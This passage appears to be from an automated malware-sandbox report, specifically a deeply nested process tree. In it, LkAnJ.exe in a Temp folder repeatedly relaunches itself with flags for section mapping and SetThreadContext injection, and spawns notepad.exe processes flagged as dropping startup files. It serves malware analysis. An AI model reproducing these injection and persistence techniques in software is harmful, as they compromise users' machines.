                                                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                                                      PID:3924
                                                                                                                                                      • C:\Windows\SysWOW64\notepad.exe
                                                                                                                                                        "C:\Windows\system32\notepad.exe"
                                                                                                                                                        59⤵
                                                                                                                                                        • Drops startup file
                                                                                                                                                        PID:492
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
                                                                                                                                                        59⤵
                                                                                                                                                          PID:3440
                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe" 2 3440 228875
                                                                                                                                                          59⤵
                                                                                                                                                            PID:504
                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
                                                                                                                                                              60⤵
                                                                                                                                                              • Suspicious behavior: MapViewOfSection
                                                                                                                                                              • Suspicious use of SetThreadContext
                                                                                                                                                              PID:1008
                                                                                                                                                              • C:\Windows\SysWOW64\notepad.exe
                                                                                                                                                                "C:\Windows\system32\notepad.exe"
                                                                                                                                                                61⤵
                                                                                                                                                                • Drops startup file
                                                                                                                                                                PID:1252
                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
                                                                                                                                                                61⤵
                                                                                                                                                                  PID:1308
                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe" 2 1308 230343
                                                                                                                                                                  61⤵
                                                                                                                                                                    PID:1296
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
                                                                                                                                                                      62⤵
                                                                                                                                                                      • Suspicious behavior: MapViewOfSection
                                                                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                                                                      PID:3340
                                                                                                                                                                      • C:\Windows\SysWOW64\notepad.exe
                                                                                                                                                                        "C:\Windows\system32\notepad.exe"
                                                                                                                                                                        63⤵
                                                                                                                                                                        • Drops startup file
                                                                                                                                                                        PID:2188
                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
                                                                                                                                                                        63⤵
                                                                                                                                                                          PID:4480
                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe" 2 4480 231781
                                                                                                                                                                          63⤵
                                                                                                                                                                            PID:3788
                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
                                                                                                                                                                              64⤵
                                                                                                                                                                              • Suspicious behavior: MapViewOfSection
                                                                                                                                                                              • Suspicious use of SetThreadContext
                                                                                                                                                                              PID:4372
                                                                                                                                                                              • C:\Windows\SysWOW64\notepad.exe
                                                                                                                                                                                "C:\Windows\system32\notepad.exe"
                                                                                                                                                                                65⤵
                                                                                                                                                                                • Drops startup file
                                                                                                                                                                                PID:4596
                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
                                                                                                                                                                                65⤵
                                                                                                                                                                                  PID:4644
                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe" 2 4644 233203
                                                                                                                                                                                  65⤵
                                                                                                                                                                                    PID:4588
                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
                                                                                                                                                                                      66⤵
                                                                                                                                                                                      • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                                                                                      PID:4720
                                                                                                                                                                                      • C:\Windows\SysWOW64\notepad.exe
                                                                                                                                                                                        "C:\Windows\system32\notepad.exe"
                                                                                                                                                                                        67⤵
                                                                                                                                                                                        • Drops startup file
                                                                                                                                                                                        PID:4668
                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
                                                                                                                                                                                        67⤵
                                                                                                                                                                                          PID:4740
                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe" 2 4740 234687
                                                                                                                                                                                          67⤵
                                                                                                                                                                                            PID:4796
                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
                                                                                                                                                                                              68⤵
                                                                                                                                                                                              • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                              • Suspicious use of SetThreadContext
                                                                                                                                                                                              PID:4748
                                                                                                                                                                                              • C:\Windows\SysWOW64\notepad.exe
                                                                                                                                                                                                "C:\Windows\system32\notepad.exe"
                                                                                                                                                                                                69⤵
                                                                                                                                                                                                • Drops startup file
                                                                                                                                                                                                PID:4836
                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
                                                                                                                                                                                                69⤵
                                                                                                                                                                                                  PID:4808
                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe" 2 4808 236078
                                                                                                                                                                                                  69⤵
                                                                                                                                                                                                    PID:4824
                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
                                                                                                                                                                                                      70⤵
                                                                                                                                                                                                      • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                                                                                                      PID:4976
                                                                                                                                                                                                      • C:\Windows\SysWOW64\notepad.exe
                                                                                                                                                                                                        "C:\Windows\system32\notepad.exe"
                                                                                                                                                                                                        71⤵
                                                                                                                                                                                                        • Drops startup file
                                                                                                                                                                                                        PID:4924
                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
                                                                                                                                                                                                        71⤵
                                                                                                                                                                                                          PID:4984
                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe" 2 4984 237531
                                                                                                                                                                                                          71⤵
                                                                                                                                                                                                            PID:4928
                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
                                                                                                                                                                                                              72⤵
                                                                                                                                                                                                              • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                              • Suspicious use of SetThreadContext
                                                                                                                                                                                                              PID:5008
                                                                                                                                                                                                              • C:\Windows\SysWOW64\notepad.exe
                                                                                                                                                                                                                "C:\Windows\system32\notepad.exe"
                                                                                                                                                                                                                73⤵
                                                                                                                                                                                                                • Drops startup file
                                                                                                                                                                                                                PID:4560
                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
                                                                                                                                                                                                                73⤵
                                                                                                                                                                                                                  PID:4572
                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe" 2 4572 238953
                                                                                                                                                                                                                  73⤵
                                                                                                                                                                                                                    PID:3964
                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
                                                                                                                                                                                                                      74⤵
                                                                                                                                                                                                                      • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                                                                                                                      PID:5060
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\notepad.exe
                                                                                                                                                                                                                        "C:\Windows\system32\notepad.exe"
                                                                                                                                                                                                                        75⤵
                                                                                                                                                                                                                        • Drops startup file
                                                                                                                                                                                                                        PID:5048
                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
                                                                                                                                                                                                                        75⤵
                                                                                                                                                                                                                          PID:1872
                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe" 2 1872 240390
                                                                                                                                                                                                                          75⤵
                                                                                                                                                                                                                            PID:5116
                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
                                                                                                                                                                                                                              76⤵
                                                                                                                                                                                                                              • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                              • Suspicious use of SetThreadContext
                                                                                                                                                                                                                              PID:3336
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\notepad.exe
                                                                                                                                                                                                                                "C:\Windows\system32\notepad.exe"
                                                                                                                                                                                                                                77⤵
                                                                                                                                                                                                                                • Drops startup file
                                                                                                                                                                                                                                PID:4112
                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
                                                                                                                                                                                                                                77⤵
                                                                                                                                                                                                                                  PID:4152
                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe" 2 4152 241843
                                                                                                                                                                                                                                  77⤵
                                                                                                                                                                                                                                    PID:4244
                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
                                                                                                                                                                                                                                      78⤵
                                                                                                                                                                                                                                      • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                      PID:3748
                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\notepad.exe
                                                                                                                                                                                                                                        "C:\Windows\system32\notepad.exe"
                                                                                                                                                                                                                                        79⤵
                                                                                                                                                                                                                                        • Drops startup file
                                                                                                                                                                                                                                        PID:4292
                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
                                                                                                                                                                                                                                        79⤵
                                                                                                                                                                                                                                          PID:4308
                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe" 2 4308 243296
                                                                                                                                                                                                                                          79⤵
                                                                                                                                                                                                                                            PID:4168
                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
                                                                                                                                                                                                                                              80⤵
                                                                                                                                                                                                                                              • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                              • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                              PID:4296
                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\notepad.exe
                                                                                                                                                                                                                                                "C:\Windows\system32\notepad.exe"
                                                                                                                                                                                                                                                81⤵
                                                                                                                                                                                                                                                • Drops startup file
                                                                                                                                                                                                                                                PID:1544
                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
                                                                                                                                                                                                                                                81⤵
                                                                                                                                                                                                                                                  PID:4356
                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe" 2 4356 244718
                                                                                                                                                                                                                                                  81⤵
                                                                                                                                                                                                                                                    PID:4224
                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
                                                                                                                                                                                                                                                      82⤵
                                                                                                                                                                                                                                                      • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                      PID:4424
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\notepad.exe
                                                                                                                                                                                                                                                        "C:\Windows\system32\notepad.exe"
                                                                                                                                                                                                                                                        83⤵
                                                                                                                                                                                                                                                        • Drops startup file
                                                                                                                                                                                                                                                        PID:604
                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
                                                                                                                                                                                                                                                        83⤵
                                                                                                                                                                                                                                                          PID:4468
                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe" 2 4468 246062
                                                                                                                                                                                                                                                          83⤵
                                                                                                                                                                                                                                                            PID:4432
                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
                                                                                                                                                                                                                                                              84⤵
                                                                                                                                                                                                                                                              • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                              • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                              PID:2496
                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\notepad.exe
                                                                                                                                                                                                                                                                "C:\Windows\system32\notepad.exe"
                                                                                                                                                                                                                                                                85⤵
                                                                                                                                                                                                                                                                • Drops startup file
                                                                                                                                                                                                                                                                PID:4060
                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
                                                                                                                                                                                                                                                                85⤵
                                                                                                                                                                                                                                                                  PID:1796
                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe" 2 1796 247500
                                                                                                                                                                                                                                                                  85⤵
                                                                                                                                                                                                                                                                    PID:1360
                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
                                                                                                                                                                                                                                                                      86⤵
                                                                                                                                                                                                                                                                      • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                      PID:1996
                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\notepad.exe
                                                                                                                                                                                                                                                                        "C:\Windows\system32\notepad.exe"
                                                                                                                                                                                                                                                                        87⤵
                                                                                                                                                                                                                                                                        • Drops startup file
                                                                                                                                                                                                                                                                        PID:4048
                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
                                                                                                                                                                                                                                                                        87⤵
                                                                                                                                                                                                                                                                          PID:3452
                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe" 2 3452 248890
                                                                                                                                                                                                                                                                          87⤵
                                                                                                                                                                                                                                                                            PID:4100
                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
                                                                                                                                                                                                                                                                              88⤵
                                                                                                                                                                                                                                                                              • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                                              • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                              PID:1684
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\notepad.exe
                                                                                                                                                                                                                                                                                "C:\Windows\system32\notepad.exe"
                                                                                                                                                                                                                                                                                89⤵
                                                                                                                                                                                                                                                                                • Drops startup file
                                                                                                                                                                                                                                                                                PID:4504
                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
                                                                                                                                                                                                                                                                                89⤵
                                                                                                                                                                                                                                                                                  PID:1296
                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe" 2 1296 250390
                                                                                                                                                                                                                                                                                  89⤵
                                                                                                                                                                                                                                                                                    PID:4444
                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
                                                                                                                                                                                                                                                                                      90⤵
                                                                                                                                                                                                                                                                                      • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                                      PID:2168
                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\notepad.exe
                                                                                                                                                                                                                                                                                        "C:\Windows\system32\notepad.exe"
                                                                                                                                                                                                                                                                                        91⤵
                                                                                                                                                                                                                                                                                        • Drops startup file
                                                                                                                                                                                                                                                                                        PID:1432
                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
                                                                                                                                                                                                                                                                                        91⤵
                                                                                                                                                                                                                                                                                          PID:4472
                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe" 2 4472 251796
                                                                                                                                                                                                                                                                                          91⤵
                                                                                                                                                                                                                                                                                            PID:4600
                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
                                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
                                                                                                                                                                                                                                                                                              92⤵
                                                                                                                                                                                                                                                                                              • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                                                              • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                                              PID:4616
                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\notepad.exe
                                                                                                                                                                                                                                                                                                "C:\Windows\system32\notepad.exe"
                                                                                                                                                                                                                                                                                                93⤵
                                                                                                                                                                                                                                                                                                • Drops startup file
                                                                                                                                                                                                                                                                                                PID:4688
                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
                                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
                                                                                                                                                                                                                                                                                                93⤵
                                                                                                                                                                                                                                                                                                  PID:4676
                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe" 2 4676 253187
                                                                                                                                                                                                                                                                                                  93⤵
                                                                                                                                                                                                                                                                                                    PID:4760
                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
                                                                                                                                                                                                                                                                                                      94⤵
                                                                                                                                                                                                                                                                                                      • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                                                      PID:1088
                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\notepad.exe
                                                                                                                                                                                                                                                                                                        "C:\Windows\system32\notepad.exe"
                                                                                                                                                                                                                                                                                                        95⤵
                                                                                                                                                                                                                                                                                                        • Drops startup file
                                                                                                                                                                                                                                                                                                        PID:4780
                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
                                                                                                                                                                                                                                                                                                        95⤵
                                                                                                                                                                                                                                                                                                          PID:4796
                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe" 2 4796 254703
                                                                                                                                                                                                                                                                                                          95⤵
                                                                                                                                                                                                                                                                                                            PID:4832
                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
                                                                                                                                                                                                                                                                                                              96⤵
                                                                                                                                                                                                                                                                                                              • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                                                                              • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                                                              PID:4948
                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\notepad.exe
                                                                                                                                                                                                                                                                                                                "C:\Windows\system32\notepad.exe"
                                                                                                                                                                                                                                                                                                                97⤵
                                                                                                                                                                                                                                                                                                                • Drops startup file
                                                                                                                                                                                                                                                                                                                PID:3084
                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
                                                                                                                                                                                                                                                                                                                97⤵
                                                                                                                                                                                                                                                                                                                  PID:5032
                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe" 2 5032 256328
                                                                                                                                                                                                                                                                                                                  97⤵
                                                                                                                                                                                                                                                                                                                    PID:3540
                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
                                                                                                                                                                                                                                                                                                                      98⤵
                                                                                                                                                                                                                                                                                                                      • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                                                                      PID:5020
                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\notepad.exe
                                                                                                                                                                                                                                                                                                                        "C:\Windows\system32\notepad.exe"
                                                                                                                                                                                                                                                                                                                        99⤵
                                                                                                                                                                                                                                                                                                                        • Drops startup file
                                                                                                                                                                                                                                                                                                                        PID:4560
                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
                                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
                                                                                                                                                                                                                                                                                                                        99⤵
                                                                                                                                                                                                                                                                                                                          PID:4024
                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe" 2 4024 257656
                                                                                                                                                                                                                                                                                                                          99⤵
                                                                                                                                                                                                                                                                                                                            PID:5056
                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
                                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
                                                                                                                                                                                                                                                                                                                              100⤵
                                                                                                                                                                                                                                                                                                                              • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                                                                                              • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                                                                              PID:5044
                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\notepad.exe
                                                                                                                                                                                                                                                                                                                                "C:\Windows\system32\notepad.exe"
                                                                                                                                                                                                                                                                                                                                101⤵
                                                                                                                                                                                                                                                                                                                                • Drops startup file
                                                                                                                                                                                                                                                                                                                                PID:5004
                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
                                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
                                                                                                                                                                                                                                                                                                                                101⤵
                                                                                                                                                                                                                                                                                                                                  PID:4108
                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe" 2 4108 259125
                                                                                                                                                                                                                                                                                                                                  101⤵
                                                                                                                                                                                                                                                                                                                                    PID:5080
                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
                                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
                                                                                                                                                                                                                                                                                                                                      102⤵
                                                                                                                                                                                                                                                                                                                                      • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                                                                                      PID:3644
                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\notepad.exe
                                                                                                                                                                                                                                                                                                                                        "C:\Windows\system32\notepad.exe"
                                                                                                                                                                                                                                                                                                                                        103⤵
                                                                                                                                                                                                                                                                                                                                        • Drops startup file
                                                                                                                                                                                                                                                                                                                                        PID:3336
                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
                                                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
                                                                                                                                                                                                                                                                                                                                        103⤵
                                                                                                                                                                                                                                                                                                                                          PID:4128
                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
                                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe" 2 4128 260546
                                                                                                                                                                                                                                                                                                                                          103⤵
                                                                                                                                                                                                                                                                                                                                            PID:4216
                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
                                                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
                                                                                                                                                                                                                                                                                                                                              104⤵
                                                                                                                                                                                                                                                                                                                                              • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                                                                                                              • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                                                                                              PID:4272
                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\notepad.exe
                                                                                                                                                                                                                                                                                                                                                "C:\Windows\system32\notepad.exe"
                                                                                                                                                                                                                                                                                                                                                105⤵
                                                                                                                                                                                                                                                                                                                                                • Drops startup file
                                                                                                                                                                                                                                                                                                                                                PID:4172
                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
                                                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
                                                                                                                                                                                                                                                                                                                                                105⤵
                                                                                                                                                                                                                                                                                                                                                  PID:4292
                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe" 2 4292 261921
                                                                                                                                                                                                                                                                                                                                                  105⤵
                                                                                                                                                                                                                                                                                                                                                    PID:4304
                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
